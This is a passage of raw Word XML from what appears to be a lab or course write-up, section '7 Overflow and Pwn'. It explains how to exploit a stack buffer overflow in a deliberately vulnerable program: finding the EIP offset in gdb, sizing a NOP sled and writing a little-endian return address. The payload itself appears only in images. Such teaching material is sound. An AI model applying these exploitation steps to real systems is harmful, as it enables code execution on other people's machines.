                          <a:ext cx="5940424" cy="29183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7.75pt;height:229.79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highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA64723">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822A4CC">
      <w:pPr>
        <w:pStyle w:val="833"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">7 Overflow and Pwn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="60681871">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>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Now let's combine our shellcode with a buffer overflow and gain a shell. We can see in the code for "vulnerable.c" and we can observe that there is a copy of the first argument to the code on the stack.</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635101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
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4656846" cy="1488581"/>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84362" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId44"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4656845" cy="1488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66.68pt;height:117.21pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId44" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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B534A0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Content of the payload we will need : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA9D71">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>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795942"/>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6050" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId45"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1795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7.75pt;height:141.41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BBF90D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First </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> we compile the program with all defenses disabled (stack protector and stack executable off). Now </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">we need to answer two questions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the distance to EIP? and Where does our buffer live in memory?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C66F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u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Run with a test pattern:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BAA98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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="darkGray"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="darkGray"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="darkGray"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) run $(python3 -c 'print("A"*64 + "BBBB" + "CCCC" + "DDDD")')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="darkGray"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="darkGray"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5368B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4419802"/>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77417" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId46"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="44198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7.75pt;height:348.02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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="10383F9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t xml:space="preserve">The buffer starts at 0x...1f0 and EIP is at 0x...23c. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This means we need 76 bytes of data before we inject our 4-byte target address inside EIP.</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874BD5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The payload we will inject is 55 bytes, so we need 76-55 = 21 bytes of NOP Sled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F949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szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Our buffer starts at 0xbffff1f0. To be safe, let's aim right at the middle of our 21-byte NOP sled. Let's add 11 bytes: 0xbffff1fb.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F7CD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ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Because of Little-Endian, we write this backwards in our exploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> \xfb\xf1\xff\xbf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="70100439">
      <w:pPr>
        <w:pStyle w:val="834"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem 1 : arg size dependent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF2BB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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">when you run a program, Linux places the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Environment Variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like PATH, USER, PWD) and your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Line Arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (argv) at the absolute highest possible addresses in the stack. Only after those are placed does it start carving out space for main() and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">func().</w:t>
      </w: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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994955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ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the stack grows downwards (from High to Low), if you make argv larger, it takes up more space at the top. This physically pushes the starting point of the rest of the stack down to lower memory addresses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C569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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="3399735"/>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16408" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId47"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="3399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7.75pt;height:267.70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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2476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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A9A376">
      <w:pPr>
        <w:pStyle w:val="834"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem 2 : works only in GDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DA19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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="2014899"/>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70208" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId48"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="2014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7.75pt;height:158.65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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="352684"/>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04956" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId49"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="352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7.75pt;height:27.77pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId49" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="1840090"/>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40038" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId50"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1840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7.75pt;height:144.89pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId50" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
